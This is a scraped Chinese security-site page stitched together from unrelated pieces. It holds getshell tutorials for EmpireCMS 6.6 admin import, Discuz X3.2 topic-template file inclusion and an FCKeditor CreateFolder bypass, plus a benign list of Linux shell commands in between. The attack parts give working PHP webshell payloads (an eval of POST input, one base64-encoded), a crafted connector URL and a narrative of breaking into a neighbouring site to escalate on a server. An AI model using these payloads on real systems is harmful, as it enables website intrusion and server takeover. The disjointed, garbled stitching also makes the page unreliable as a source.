漏洞修复相关信息
?相关漏洞修复文章推荐
热门漏洞修复文章推荐
sougou拼音输入法的一个可以被用作
使用小草淘宝客程序搭建网站，淘宝
漏洞文件 customform/CustomFormJS
作者：暗黑 最近由于比较蛋疼的原
本来是搞一个站，linux+php+Sybase
当在QQ空间发布一条说说链接到一个
游戏网娱乐平台 有CKFinder编辑器
记事狗微博系统，后台存在设计缺陷
第一：先看是否有可以测试的 账户
看了以下帖子想写一点东西，原帖内
广告赞助商
漏洞修复文章阅读排
帝国(EmpireCMS)cms 6.6 后台拿shell
作者:吾吾织梦
摘要:以前6.5(/Article/10.html)的有人发的方法是，（进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传，新版使用uploadm~num.php来递增数字）发现6.6不行，上传
以前6.5(/Article/10.html)的有人发的方法是，（进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传，新版使用uploadm~num.php来递增数字）发现6.6不行，上传之后会变成类似uploadmnXmTdQamQq.php这样的！
漏洞证明：换了个办法其实也很简单&?fputs(fopen("cao.php","w"),"&?eval(\$_POST[cmd]);?&")?& 保存为1.php.mod 然后还是进入后台---系统设置---管理数据表---管理系统模型---导入新型模块，上传之后马儿就躺在了/e/admin/cao.php了
修复方案：你懂的哦？
作者 discovery
原文出处：吾吾织梦
(原文出处：吾吾织梦)
------分隔线----------------------------
◎ 广告赞助
◎ 阅读说明READ EXPLANATION
推荐使用第三方专业下载工具下载本站软件，使用 WinRAR v3.10 以上版本解压本站软件。
本站空间有限.资源到网盘下载.谢谢&& 赞助本站(广告),联系站长QQ&&
为加快源码更新本站源码未全部调试.所以有关源码问题请到交流,讨论,
如须购买金币(升级VIP)&本站解压密码
下载本站资源，如果服务器暂不能下载请过一段时间重试！
如果遇到什么问题，请到本站论坛去咨寻，我们将在那里提供更多 、更好的资源！
本站提供的一些商业软件是供学习研究之用，如用于商业用途，请购买正版。 > 
Discuz3.2漏洞文件包含漏洞可后台拿shell
    时间:
09:21    阅读:
    整理: 红客VIP
简要描述：
最新版本：! X3.2 Release
包罗以前版本
详细说明：
由于创建专题时未对
静态化名称
做任何限制引发此
1.全局-&站点信息
http:///#&?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4='));?&
2.工具-&更新缓存
3.门户-&HTML办理
静态文件扩展名: htm
专题HTML存放目录:data/cache
4.创建专题
静态化名称[此处未做任何限制]：../../template/default/portal/portal_topic_test
5.专题办理
对刚添加的专题 开启 并生成
6.再次创建专题
模板名 选择刚生成的 ./template/default/portal/portal_topic_test.htm
就执行了php代码
&?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4='));?&
不仅仅是可以生成到专标题问题录，，可以生成到任何可以包含的下面！
来源与乌云。
【】【】【】【】【】工作快一年了，shell命令也玩了一年了。还是有点积累的，下面是本人常用的。
1、pwd | xargs -i basename {} & 获取当前所在目录的名称
2、ps -ef|grep -w &indexd_admin_mcd.pid|grep -v grep|wc -l
ps -ef 查找进程 & &grep -v &查找不存在 &grep -w&强制 PATTERN 仅匹配整个词
查找进程中为&indexd_admin_mcd.pid的进程，并且排除掉grep的进程。最后计数，这样进程的个数。
3、if [ $cn -lt 1 ] & 如果cn的值& 1
4、ulimit &-c & 最大的core文件的大小，以blocks为单位。 & &ulimit -c &unlimited &对生成的core文件大小不进行限制。
kill -9 pid，是不顾后果的强制终止(如果的你的速度够快，有时候是和ctrl＋c是一样的)
kill -15 pid，是先关闭和其有关的程序，再将其关闭
6、crontab
crontab -l&&& 显示crontab中的所有的内容
crontab filename&&&& 用新的文件代替crontab里的所有的内容。
所有想在crontab中添加新的自动运行的进程，则先用crontab -l &temp，先将crontab中所有的内容全部重定向到一个新的文件中，然后在这个temp文件后&&追加内容。最后用crontab temp，用temp的文件内容替代crontab的所有的内容。
crontab文件的格式：分& 时& 日& 月& 星期
7、$()与‘’的意思相同，获取shell执行后的值，但是用$()会更加的直观。& ${},{}中经常放的是变量，这样在${}就可以精确后面的变量的范围了。
${file#*/}：拿掉第一条/及其左边的字符串：&dir1/dir2/dir3/my.file.txt
${file##*/}：拿掉最后一条/及其左边的字符串：my.file.txt
${file#*.}：拿掉第一个.及其左边的字符串：file.txt
${file##*.}：拿掉最后一个.及其左边的字符串：txt
${file%/*}：拿掉最后条/及其右边的字符串：/dir1/dir2/dir3
${file%%/*}：拿掉第一条 / 及其右边的字符串：(空值)
${file%.*}：拿掉最后一个 . 及其右边的字符串：/dir1/dir2/dir3/my.file
${file%%.*}：拿掉第一个 . 及其右边的字符串：/dir1/dir2/dir3/my
(( A )) 做运算的，A是任何的运算的表达式 A中的变量可用$来替换，也可以不用。
&9、if& 判断条件中 $#&& 和$? 是什么意思？
$#& 获取参数的数目my.sh p1 &p2 p3& 为例&& $#可得到2
$@ 与 $* 均可获得所有的参数&my.sh p1 &p2 p3& p4&$@ 与 $* 得到p1 p2 p3 p4
但是，如果置于 soft quote 中的话：
&$@&&则可得到&&p1& &p2 p3& &p4&&这三个不同的词段(word)
&$*&&则可得到&&p1 p2 p3 p4&&这一整串单一的词段。
10、在 shell command line 中可用 $? 这个变量得到最新的一个 return value ，也就是刚结束的那个行程传回的值。
* 若在 script 里，用 exit RV 来指定其值，若没指定，在结束时以最后一道命令之 RV 为值。
* 若在 function 里，则用 return RV 来代替 exit RV 即可。
11、重定向输出
* 2&&1 就是将 stderr 并进 stdout 作输出
* 1&&2 或 &&2 就是将 stdout 并进 stderr 作输出
ls my.file no.such.file 2&/dev/null
* 若将 FD1 跟 FD2 转到 /dev/null 去，就可将 stdout 与 stderr 弄不见掉。
* 若将 FD0 接到 /dev/null 来，那就是读进 nothing 。
&/dev/null 2&&1 &&单纯只跑程序，不想看到任何输出结果 &除了用 &/dev/null 2&&1 之外，你还可以&&/dev/null
12、tee复制
所谓 tee 命令是在不影响原本 I/O 的情况下，将 stdout 复制一份到档案去。
cm1 | cm2 | tee file | cm3
在预设上， tee 会改写目标档案，若你要改为增加内容的话，那可用 -a 参数达成。
凡举 cat, more, head, tail, wc, expand, tr, grep, sed, awk, ... 等等文字处理工具，搭配起 pipe line 来使用
13、shell程序的参数
& $0 & 当前程序的执行名字
& $n & 当前程序的第n个参数值，n=1..9
&&$* & 当前程序的所有参数
& $# & 当前程序的参数个数
& $$ & 当前程序的PID
& $! & 执行上一个指令的PID
& $? &执行上一个指令的返回值
14、date显示时间
date '+%F %T' & & 15:52:54 & 等同于date +&%Y-%m-%d %T&
date -d '-1 days' +&%Y%m%d& & &获取前一天的时间
15、if添加的判断的另一个方式
判断参数的个数
&&&&echo&&Usage:
$0 worker_id&
&&&&exit&1
&&&&WORKER_ID=$1
&&&&MAX_WORKER_ID=$WORKER_ID
&&&&echo&&Usage:
$0 [worker_id]&
&&&&exit&1
&&&&echo&&worker
count $WORKER_CNT&
这样写if的条件的判断就和c语言的一样了，条件运算
16、ipcs &查看共享内存的使用的情况
ipcrm -M &shmid &关闭共享内存
17、make -p
即使data这个文件夹不存在，也可以创建他的子目录，当然同同时，他也被创建。
mkdir -p /data/coredump
18、head &tail
head 是显示一个文件的内容的前多少行；
head& -n& 行数值& 文件名；
比如我们显示/etc/profile的前10行内容，应该是：
[root@localhost ~]# head -n 10 /etc/profile
tail 工具，显示文件内容的最后几行，用法比较简单；
tail&& -n& 行数值& 文件名；
比如我们显示/etc/profile的最后5行内容，应该是：
[root@localhost ~]# tail& -n 5 /etc/profile
19、创建软链接
ln -sf &a &b & & b链向a
20、export &执行的路径
export LD_LIBRARY_PATH=./
21、if& [ expr ];&& then … fi
字符串 str 是否不为空
字符串是否为空
str1&&=&str2
&str1是否与 str2 相同
str1&!=&str2
&str1是否与 str2 不同
int1&-eq&int2
int1&-le& int2
int1&-ge&int2
int1&-lt&& int2
int1&-gt& int2
int1&-ne&int2
是否块文件
文件是否为一个命名管道
是否字符文件
文件是否可读
是否一个目录 *
文件的长度是否不为零
文件是否存在 *
是否为套接字文件
是否普通文件 *
文件是否可执行，则为真
是否设置了文件的 SGID 位
是否设置了文件的 SUID 位
文件是否存在且归该组所有
文件是否可写，则为真
文件是否设置了的粘贴位
fd 是否是一个与终端相连的打开的文件描述符（fd 默认为 1）
文件是否存在且归该用户所有
22、for循环
for((i=1;i&=100;++i))
&&&&echo&$i
23、对一行的第一列进行排重，只保留最新的数据。awk的内置的数组进行排重，排重之后在sort
filename=$1
&&&&cont[$1]
&&&&for&(key&in&cont)
cont[key];
$filename |&sort&-k1
24、显示上次文件的创建的时间
stat -c %Y $file
25、while循环
26、查看当前目录下的文件的大小
du -h --max-depth=1
27、# nohup&&./pso & pso.file 2&&1 &
解释：nohup就是不挂起的意思，将pso直接放在后台运行，并把终端输出存放在当前目录下的pso.file文件中。
当客户端关机后重新登陆服务器后，直接查看pso.file文件就可看执行结果（命令：#cat pso.file&）。
28、将大文件分割为指定大小的文件
split -b 1m _quey.txt
29、对windows上传的文件进行处理，处理特殊字符
dos2unix over_wap_query_seed..txt
30、将window的^M回车符号换成linux的
tr -s &[\r]& &[\n]& & log.get
tr -s &[\015]& &\n& & log.get
31、在securecrt软件上显示用户名和ip
echo -ne &\e]2;${USER}@$(/sbin/ifconfig&eth1 | awk -F&[ :]+& '/inet addr/{print $4}')\a&
如果你是root用户，把下面上面的那句命令行追加到 /etc/profile
如果你是个人账户，在自己的家目录新建一个 .profile 文件，把命令行追加到.profile文件
32、shell保留两位小数
echo &scale=2; 1*100/3& | bc
33、去掉变量的最后一个字符
echo $AA | cut -c 1-$(expr ${#AA} - 1)
34、linux下如何查询已知进程运行目录
&ls -l /proc/PID/cwd
原创文章，转载请注明：&转载自
本文链接地址：&
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：111403次
积分：1817
积分：1817
排名：第10205名
原创：55篇
转载：10篇
评论：59条
(11)(3)(2)(8)(5)(1)(1)(4)(5)(2)(7)(2)(1)(13)FCK突破建立文件夹后台拿shell - 安全焦点 | 黑客与互联网信息安全自媒体网站
FCK突破建立文件夹后台拿shell
& 今天准备搞一个站，在此站搞了一翻后发现此站没有找到可利用的漏洞，此时就有点感觉蛋疼了，所以就想找个旁站来提权，扫描了一下旁站 我靠没有几个站点，后来在经过一翻努力下，终于还是登录进了一个站的后台，在后台瞧了一会，发现是FCK编辑器，哈 有点希望了，马上想到用FCK的突破建立文件夹的漏洞试下。下面就写下FCK突破建立文件夹后台拿shell方法，这个百度里面有很多这样的教程，现在我还是稍微详细的写一篇吧。
找了个添加新闻的地方，点击上传图片→浏览服务器，如下图：
然后新建一个文件夹，命名为 qxz.asp&如下图：
但是被自动命名变成了 qxz_asp 如下图：
下面我们就要用到绕过代码来突破了，代码如下：
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=4
把上面的代码加在网站链接后面，按下回车。如：/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=4
然后关掉此页面，再次点击添加图片 浏览服务器。自动创建了一个 shell.asp 的文件夹
然后把一句话改名为 yjh..jpg 上传一句话马到此文件夹中。
OK菜刀链接地址 http://www.xxx.com/Upload/image/shell.asp/yjh_.jpg
最后上大马，经过一翻提权战斗，终于拿下了这台服务器，天色不早了，提权过程就不写了。}